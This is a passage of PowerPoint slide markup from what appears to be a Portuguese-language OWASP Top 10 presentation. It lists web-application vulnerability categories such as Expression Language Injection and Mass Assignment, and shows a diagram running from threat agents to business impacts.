                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Denial of Service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Was 2004 Top 10 – Entry 2004-A9)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Expression Language Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>CWE-917</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Information Leakage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Improper Error Handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Was part of 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Entry 2007-A6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Insufficient Anti-automation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>CWE-799</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Insufficient Logging and Accountability (Related to 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Entry 2007-A6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Lack of Intrusion Detection and Response</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Malicious File Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Was 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Entry 2007-A3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Mass Assignment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>CWE-915</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>User Privacy</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992098" y="3101831"/>
            <a:ext cx="740908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Prevalência</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4181450" y="3101831"/>
            <a:ext cx="628698" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Detecção</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979857" y="3106780"/>
            <a:ext cx="715260" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploração</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282634" y="3091161"/>
            <a:ext cx="580608" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Impacto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="983996" y="2620973"/>
            <a:ext cx="5797803" cy="629617"/>
            <a:chOff x="211107" y="1014596"/>
            <a:chExt cx="6560241" cy="629617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="211107" y="1014596"/>
              <a:ext cx="6560241" cy="629617"/>
              <a:chOff x="211107" y="997424"/>
              <a:chExt cx="6560241" cy="629617"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2861647" y="1073877"/>
                <a:ext cx="1323082" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Vulnerabilidades</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>              de Segurança</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="50" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="53" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309048" y="1078960"/>
                <a:ext cx="838201" cy="357187"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vetores de</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Ataque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4964680" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> Técnicos</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="1232"/>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45" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="3"/>
                <a:endCxn id="42" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4184729" y="1263956"/>
                <a:ext cx="779951" cy="421"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="211107" y="1329524"/>
                <a:ext cx="843782" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agentes de </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6009348" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="48" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="42" idx="4"/>
                <a:endCxn id="47" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5650481" y="1263956"/>
                <a:ext cx="358867" cy="421"/>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44" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="39" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2188570" y="1263652"/>
                <a:ext cx="673078" cy="725"/>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
          <p:nvSpPr>
            <p:cNvPr id="37" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2991923" y="1091049"/>
              <a:ext cx="220306" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>
              <a:ext cx="110153" cy="9514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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787043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6875119" cy="9143999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17952329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style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sobre a OWASP</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075021189"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
